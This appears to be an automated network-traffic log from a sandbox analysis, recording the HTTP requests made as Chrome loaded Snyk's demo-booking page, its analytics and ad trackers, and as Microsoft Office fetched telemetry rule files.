Source: global trafficHTTP traffic detected: GET /scripts/microsoftBingUET.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; _gd_visitor=52fa9eae-bf9e-4cb6-8e27-255d8523976a; _gd_session=3e91f9fe-a7d4-4be9-811a-49b3de969a02; _an_uid=0
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /scripts/trendemon.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; _gd_visitor=52fa9eae-bf9e-4cb6-8e27-255d8523976a; _gd_session=3e91f9fe-a7d4-4be9-811a-49b3de969a02; _an_uid=0
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; _gd_visitor=52fa9eae-bf9e-4cb6-8e27-255d8523976a; _gd_session=3e91f9fe-a7d4-4be9-811a-49b3de969a02; _an_uid=0; _gcl_au=1.1.1154500146.1729799382; _ga=GA1.1.1178466141.1729799377; _ga_X9SH3KP7B4=GS1.1.1729799375.1.0.1729799381.60.0.0
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /analytics.js/v1/UspolAZH46ZIH3mN3bdf7rx63q24gitb/analytics.min.js HTTP/1.1Host: cdn.segment.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uct?v=1&sid=Zz23KCbJ4&t=1&abv=&r=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&cb=1729799382000 HTTP/1.1Host: uct.service.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /pagead/landing?gcs=G111&gcu=1&gcd=13r3r3r3r5l1&tag_exp=101533421~101686685~101794737~101823848&rnd=2023604814.1729799364&url=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&dma=0&npa=0&gtm=45He4al0n81W4LKKNLv9131853231za200zb896252831&auid=1154500146.1729799382&apve=0 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bat.js HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /scripts/microsoftBingUET.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; _gd_visitor=52fa9eae-bf9e-4cb6-8e27-255d8523976a; _gd_session=3e91f9fe-a7d4-4be9-811a-49b3de969a02; _an_uid=0; _gcl_au=1.1.1154500146.1729799382; _ga=GA1.1.1178466141.1729799377; _ga_X9SH3KP7B4=GS1.1.1729799375.1.0.1729799381.60.0.0
Source: global trafficHTTP traffic detected: GET /scripts/trendemon.js HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}; _gd_visitor=52fa9eae-bf9e-4cb6-8e27-255d8523976a; _gd_session=3e91f9fe-a7d4-4be9-811a-49b3de969a02; _an_uid=0; _gcl_au=1.1.1154500146.1729799382; _ga=GA1.1.1178466141.1729799377; _ga_X9SH3KP7B4=GS1.1.1729799375.1.0.1729799381.60.0.0
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /uct?v=1&sid=Zz23KCbJ4&t=1&abv=&r=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&cb=1729799382000 HTTP/1.1Host: uct.service.usercentrics.euConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /tag/trends.min.js HTTP/1.1Host: assets.trendemon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /p/action/56377455.js HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /v1/projects/UspolAZH46ZIH3mN3bdf7rx63q24gitb/settings HTTP/1.1Host: cdn.segment.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://snyk.ioSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /analytics.js/v1/UspolAZH46ZIH3mN3bdf7rx63q24gitb/analytics.min.js HTTP/1.1Host: cdn.segment.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bat.js HTTP/1.1Host: bat.bing.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /action/0?ti=56377455&Ver=2&mid=f0fff001-24ec-4450-8bc0-396d1d928851&bo=1&sid=1e8f13a0924111ef987e7bea928c5f98&vid=1e8f4410924111ef84649b3d534e5cfc&vids=1&msclkid=N&uach=pv%3D10.0.0&pi=918639831&lg=en-US&sw=1280&sh=1024&sc=24&tl=See%20Snyk%20in%20action%20-%20Book%20a%20live%20demo%20%7C%20Snyk&p=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&r=&lt=19129&evt=pageLoad&sv=1&cdb=ARoR&rn=820266 HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /p/action/56377455.js HTTP/1.1Host: bat.bing.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /api/settings/2025?callback=jsonp347082&vid= HTTP/1.1Host: trackingapi.trendemon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /api/settings/2025?callback=jsonp347082&vid= HTTP/1.1Host: trackingapi.trendemon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /analytics-next/bundles/ajs-destination.bundle.ed53a26b6edc80c65d73.js HTTP/1.1Host: cdn.segment.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /global/identity.min.js HTTP/1.1Host: assets.trendemon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tag/trends.min.js HTTP/1.1Host: assets.trendemon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/projects/UspolAZH46ZIH3mN3bdf7rx63q24gitb/settings HTTP/1.1Host: cdn.segment.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /analytics-next/bundles/ajs-destination.bundle.ed53a26b6edc80c65d73.js HTTP/1.1Host: cdn.segment.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /analytics-next/bundles/schemaFilter.bundle.5c2661f67b4b71a6d9bd.js HTTP/1.1Host: cdn.segment.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /global/identity.min.js HTTP/1.1Host: assets.trendemon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /api/Identity/me?accountId=2025&DomainCookie=17297993867885496&fingerPrint=5b643f5f119a435c118134a86d633054&callback=jsonp935288&vid= HTTP/1.1Host: trackingapi.trendemon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /next-integrations/integrations/google-analytics/2.18.5/google-analytics.dynamic.js.gz HTTP/1.1Host: cdn.segment.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /analytics-next/bundles/schemaFilter.bundle.5c2661f67b4b71a6d9bd.js HTTP/1.1Host: cdn.segment.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /next-integrations/integrations/linkedin-insight-tag/1.0.1/linkedin-insight-tag.dynamic.js.gz HTTP/1.1Host: cdn.segment.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/Identity/me?accountId=2025&DomainCookie=17297993867885496&fingerPrint=5b643f5f119a435c118134a86d633054&callback=jsonp935288&vid= HTTP/1.1Host: trackingapi.trendemon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: trd_gavid_2025=17297993867885496; trd_gvid=17297993867885496; trd_vid_2025=2025%3A17297993867885496
Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
